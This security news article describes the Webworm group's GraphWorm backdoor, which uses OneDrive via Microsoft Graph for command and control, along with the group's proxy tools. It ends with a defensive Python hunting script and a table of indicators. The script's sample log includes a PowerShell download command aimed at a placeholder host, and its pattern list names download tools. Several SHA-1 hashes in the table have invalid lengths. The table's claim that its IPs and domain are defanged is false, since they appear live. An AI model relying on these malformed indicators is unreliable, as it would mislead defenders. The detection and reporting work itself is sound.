A well-known China-aligned threat group has quietly evolved its attack methods, and its latest toolset reveals just how far it is willing to go to stay hidden.
A backdoor called GraphWorm has surfaced as part of this group’s growing arsenal, and what makes it stand out is the way it uses Microsoft OneDrive as its command-and-control channel.
Instead of communicating with suspicious servers, it hides its activity inside one of the world’s most trusted cloud platforms.
The threat group behind GraphWorm is tracked as Webworm, a China-aligned operation that has been active since at least 2017 and has steadily expanded its reach.
Initially focused on organizations across Asia, the group has since shifted its attention toward European targets, including government bodies in Belgium, Italy, Serbia, and Poland.
It has also targeted a university in South Africa, showing that its scope continues to widen.
WeLiveSecurity researchers said in a report shared with Cyber Security News that they identified the malware and published their findings on the group’s updated techniques.
They noted that Webworm had previously relied on well-known backdoors like McRat and Trochilus, but has now moved away from those tools in favor of stealthier, custom-built options.
GraphWorm is one of two new backdoors added to the group’s toolkit, alongside a Discord-based backdoor called Choreerp.
GraphWorm, also referred to internally as OverOneDrive, is written in Go and uses Microsoft’s Graph API to communicate exclusively through OneDrive.
This approach makes its traffic look like ordinary cloud activity, which helps it slip past many security tools. A separate folder is created in OneDrive for each victim, and three subfolders handle different tasks: storing files, receiving job instructions, and sending back results from commands run on the infected machine.
The group’s initial access techniques also offer a window into how victims first get compromised.
Webworm operators were found using open-source tools like Nuclei, a vulnerability scanner, and dirsearch, a web path scanner, against targets in Spain, Hungary, Belgium, Nigeria, Czechia, and Serbia.
A script exploiting a known post-authentication remote code execution flaw in SquirrelMail was also found in use, suggesting the group is actively hunting for exposed web applications as entry points.
GraphWorm sets itself apart by routing all communications through a legitimate Microsoft OneDrive instance rather than a dedicated server.
Upon first execution, the backdoor generates a unique victim identifier by combining network adapter details, processor information, and a device serial number.
It then creates or renames a OneDrive folder using this ID, ensuring each compromised machine has its own isolated workspace in the cloud.
Commands supported by the backdoor include uploading and downloading files, executing shell commands through cmd.exe, and adjusting sleep intervals.
Results from executed commands are written to a file named beaconshelloutput.txt and then uploaded back to OneDrive using Microsoft’s createUploadSession API endpoint.
Since the backdoor works entirely within a cloud environment, it can handle large file uploads without raising typical red flags.
Beyond the two new backdoors, Webworm has built an extensive proxy network using a combination of open-source and custom tools.
These include Wormsrp, a custom fork of the fast reverse proxy tool frp; ChainWorm, which chains multiple proxy hops together; SmuxProxy, based on the port-forwarding tool iox; and WormSocket, which routes traffic through websocket connections.
Each of these tools adds another layer between the attacker and their victim, making it harder to trace activity back to its source.
The group also used a compromised Amazon S3 bucket at wamanharipethe.s3.ap-south-1.amazonaws.com to store and retrieve configuration files for some of these proxy tools.
Files found in the bucket included virtual machine snapshots containing configuration data from a government entity in Italy and documents exfiltrated from a government body in Spain.
Security teams are advised to monitor for unusual outbound connections to cloud storage services, audit scheduled tasks and registry run keys for unauthorized entries, and watch for processes using cmd.exe or powershell.exe to download files from external sources.
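The detection advice above can be turned into a simple hunt over endpoint telemetry. The following is an added example, not code from the report or from the GraphWorm samples: it scans constructed log records for non-baseline processes talking to the Microsoft Graph drive endpoints (escalating on createUploadSession and the beaconshelloutput.txt artifact), for cmd.exe spawned by such a process, and for cmd.exe/powershell.exe download one-liners. The log format, the process allowlist and the VICTIMID folder name are assumptions.

```python
import re

# Constructed sample telemetry (not from the report), one record per line:
# timestamp|host|process|dest_host|url_path|command_line
SAMPLE_LOG = """\
2024-05-01T09:00:01Z|ws01|OneDrive.exe|graph.microsoft.com|/v1.0/me/drive/root/children|
2024-05-01T09:00:07Z|ws01|OverOneDrivev0316.exe|graph.microsoft.com|/v1.0/me/drive/root:/VICTIMID-placeholder/results/beaconshelloutput.txt:/createUploadSession|
2024-05-01T09:00:09Z|ws01|OverOneDrivev0316.exe|||cmd.exe /c whoami
2024-05-01T09:01:00Z|ws02|powershell.exe|files.example.org|/tool.bin|powershell -c Invoke-WebRequest http://files.example.org/tool.bin -OutFile t.bin
2024-05-01T09:02:00Z|ws03|msedge.exe|graph.microsoft.com|/v1.0/me/drive/root/children|
"""

# Assumed baseline of processes expected to use Graph/OneDrive; tune per estate.
GRAPH_ALLOWLIST = {"onedrive.exe", "msedge.exe", "outlook.exe", "teams.exe", "explorer.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
DOWNLOAD_RE = re.compile(r"invoke-webrequest|downloadfile|downloadstring|curl\s|certutil.*urlcache|bitsadmin", re.I)

def detect(log_text):
    """Return a list of findings (host, process, rule, severity) for the given records."""
    findings = []
    suspicious = set()  # (host, process) pairs already seen abusing Graph/OneDrive
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _ts, host, proc, dest, path, cmd = line.split("|", 5)
        p = proc.lower()
        # Rule 1: OneDrive access through Graph by a process outside the baseline.
        if dest == "graph.microsoft.com" and "/drive" in path and p not in GRAPH_ALLOWLIST:
            sev = "high" if "createUploadSession" in path else "medium"  # upload session = file staging
            if "beaconshelloutput.txt" in path:  # command-output file named in the report
                sev = "critical"
            findings.append({"host": host, "process": proc, "rule": "unexpected-graph-onedrive", "severity": sev})
            suspicious.add((host, p))
        # Rule 2: a process already flagged for Graph abuse launching cmd.exe (command execution path).
        if cmd.lower().startswith("cmd.exe") and (host, p) in suspicious:
            findings.append({"host": host, "process": proc, "rule": "graph-beacon-spawns-cmd", "severity": "high"})
        # Rule 3: cmd.exe/powershell.exe pulling files from external sources.
        if p in SHELLS and DOWNLOAD_RE.search(cmd):
            findings.append({"host": host, "process": proc, "rule": "shell-download", "severity": "medium"})
    return findings

if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f)
```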
Indicators of Compromise (IoCs):

| Type | Indicator | Description |
|---|---|---|
| SHA-1 Hash | 50433336707381429707F59C3CBE8D497D98 | SearchApp.exe — Win/Agent.KBuf |
| SHA-1 Hash | 1DF40A4A31B30B62EC33DC6FECC2C4408302ADC7 | ssh.exe — Win/Hack Tool/Proxy.WQ |
| SHA-1 Hash | 7DCFE9EE25841DFD58D3D6871BF867FE32141DFB | svc.exe — MSIL/Hack Tool/Proxy.WQ |
| SHA-1 Hash | 7F1970D620216C5FFF4E14A6CCC13FCCC267217C2 | OverOneDrivev0316.exe — Win/Agent.78CV.M |
| SHA-1 Hash | 48159A7FC2E688386864BEA59FD40DFFC4B24D6 | MessengerClient.exe — MSIL/Hack Tool/Proxy.WQ |
| SHA-1 Hash | A3C077BDF8898E612CCD65BC82E7960834ADB2A9 | dsocks.exe — Win/RiskWare/iox |
| Domain/URL | wamanharipethe.s3.ap-south-1.amazonaws.com | Compromised S3 bucket used for config and data exfiltration |
| IP Address | 45.77.13.67 | Vultr Holdings — Wormsrp web server |
| IP Address | 64.176.85.158 | The Constant Company — Wormsrp web server |
| IP Address | 104.243.23.43 | Networksoc — SmuxProxy server |
| IP Address | 108.61.200.151 | Vultr Holdings — Wormsrp proxy |
| IP Address | 144.168.60.233 | Networksoc — Reverse proxy/Edison service |
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.